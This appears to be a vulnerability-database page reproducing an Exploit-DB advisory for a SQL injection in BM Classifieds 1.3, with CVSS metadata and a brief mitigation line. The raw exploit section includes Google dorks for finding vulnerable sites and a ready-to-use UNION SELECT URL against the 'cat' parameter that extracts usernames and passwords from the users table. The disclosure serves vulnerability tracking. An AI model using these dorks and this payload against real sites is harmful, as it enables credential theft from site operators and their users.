BM Classifieds ads SQL injection vulnerability

vendor:

BM Classifieds

by:

Dr.0rYX & Cr3w-DZ

7.5

CVSS

HIGH

SQL injection

CWE

Product Name: BM Classifieds

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

N/A

BM Classifieds ads SQL injection vulnerability

An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable parameter 'cat' in the 'classifieds.php' script. This will allow the attacker to gain access to the database and extract sensitive information.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.

Source

Exploit-DB raw data:

###############################

                                                  ALGERIAN HACKER
   **********************- NORTH-AFRICA SECURITY TEAM -***********************

  [!]            BM Classifieds ads SQL injection vulnerability
  [!] Author    : Dr.0rYX & Cr3w-DZ
  [!] MAIL      : vx3@hotmail.de  &  Cr3w@hotmail.de

  ***************************************************************************/

  [ Software Information ]

  [+] Vendor : http://www.bmscripts.com/
  [+] script   : powered by BM Classifieds
  [+] Demo : http://classifieds.bmscripts.com/
  [+] Version() : 1.3
  [+] Vulnerability : SQL injection
  [+] Dork :inurl:"classifieds.php?cat="
               inurl::"showad.php?listingid="

  **************************************************************************/
  [ Vulnerable File ]

  http://server/classifieds.php?cat=[N.A.S.T ]

  [ Exploit ]

  http://server/classifieds.php?cat=144+union+select+username,password,3,4+from+users

  [  GReet ]

  [+] :xcv-dz , CLAW , kader11000 ,le0n , exploit-db.com , ALL HACKERS MUSLIMS